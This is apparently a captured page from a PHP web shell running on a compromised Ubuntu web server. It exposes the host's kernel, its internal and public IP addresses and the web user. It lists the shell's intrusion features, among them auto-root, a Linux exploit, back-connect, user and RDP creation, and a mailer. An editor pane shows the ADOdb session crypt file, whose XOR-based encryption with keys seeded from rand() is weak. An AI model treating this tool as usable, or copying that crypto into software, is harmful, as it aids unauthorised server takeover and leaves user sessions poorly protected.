Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.89.197
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdu /
libs /
adodb5 /
session /
[ HOME SHELL ]
Name
Size
Permission
Action
old
[ DIR ]
drwxr-xr-x
adodb-compress-bzip2.php
2.01
KB
-rwxr-xr-x
adodb-compress-gzip.php
1.48
KB
-rwxr-xr-x
adodb-cryptsession.php
630
B
-rwxr-xr-x
adodb-cryptsession2.php
631
B
-rwxr-xr-x
adodb-encrypt-mcrypt.php
1.79
KB
-rwxr-xr-x
adodb-encrypt-md5.php
757
B
-rwxr-xr-x
adodb-encrypt-secret.php
1008
B
-rwxr-xr-x
adodb-encrypt-sha1.php
374
B
-rwxr-xr-x
adodb-sess.txt
3.69
KB
-rwxr-xr-x
adodb-session-clob.php
553
B
-rwxr-xr-x
adodb-session-clob2.php
554
B
-rwxr-xr-x
adodb-session.php
20.73
KB
-rwxr-xr-x
adodb-session2.php
21.29
KB
-rwxr-xr-x
adodb-sessions.mysql.sql
396
B
-rwxr-xr-x
adodb-sessions.oracle.clob.sql
281
B
-rwxr-xr-x
adodb-sessions.oracle.sql
313
B
-rwxr-xr-x
crypt.inc.php
2.75
KB
-rwxr-xr-x
session_schema.xml
537
B
-rwxr-xr-x
session_schema2.xml
715
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : crypt.inc.php
<?php // Session Encryption by Ari Kuorikoski <ari.kuorikoski@finebyte.com> class MD5Crypt{ function keyED($txt,$encrypt_key) { $encrypt_key = md5($encrypt_key); $ctr=0; $tmp = ""; for ($i=0;$i<strlen($txt);$i++){ if ($ctr==strlen($encrypt_key)) $ctr=0; $tmp.= substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1); $ctr++; } return $tmp; } function Encrypt($txt,$key) { srand((double)microtime()*1000000); $encrypt_key = md5(rand(0,32000)); $ctr=0; $tmp = ""; for ($i=0;$i<strlen($txt);$i++) { if ($ctr==strlen($encrypt_key)) $ctr=0; $tmp.= substr($encrypt_key,$ctr,1) . (substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1)); $ctr++; } return base64_encode($this->keyED($tmp,$key)); } function Decrypt($txt,$key) { $txt = $this->keyED(base64_decode($txt),$key); $tmp = ""; for ($i=0;$i<strlen($txt);$i++){ $md5 = substr($txt,$i,1); $i++; $tmp.= (substr($txt,$i,1) ^ $md5); } return $tmp; } function RandPass() { $randomPassword = ""; srand((double)microtime()*1000000); for($i=0;$i<8;$i++) { $randnumber = rand(48,120); while (($randnumber >= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96)) { $randnumber = rand(48,120); } $randomPassword .= chr($randnumber); } return $randomPassword; } } class SHA1Crypt{ function keyED($txt,$encrypt_key) { $encrypt_key = sha1($encrypt_key); $ctr=0; $tmp = ""; for ($i=0;$i<strlen($txt);$i++){ if ($ctr==strlen($encrypt_key)) $ctr=0; $tmp.= substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1); $ctr++; } return $tmp; } function Encrypt($txt,$key) { srand((double)microtime()*1000000); $encrypt_key = sha1(rand(0,32000)); $ctr=0; $tmp = ""; for ($i=0;$i<strlen($txt);$i++) { if ($ctr==strlen($encrypt_key)) $ctr=0; $tmp.= substr($encrypt_key,$ctr,1) . (substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1)); $ctr++; } return base64_encode($this->keyED($tmp,$key)); } function Decrypt($txt,$key) { $txt = $this->keyED(base64_decode($txt),$key); $tmp = ""; for ($i=0;$i<strlen($txt);$i++){ $sha1 = substr($txt,$i,1); $i++; $tmp.= (substr($txt,$i,1) ^ $sha1); } return $tmp; } function RandPass() { $randomPassword = ""; srand((double)microtime()*1000000); for($i=0;$i<8;$i++) { $randnumber = rand(48,120); while (($randnumber >= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96)) { $randnumber = rand(48,120); } $randomPassword .= chr($randnumber); } return $randomPassword; } } ?>
Close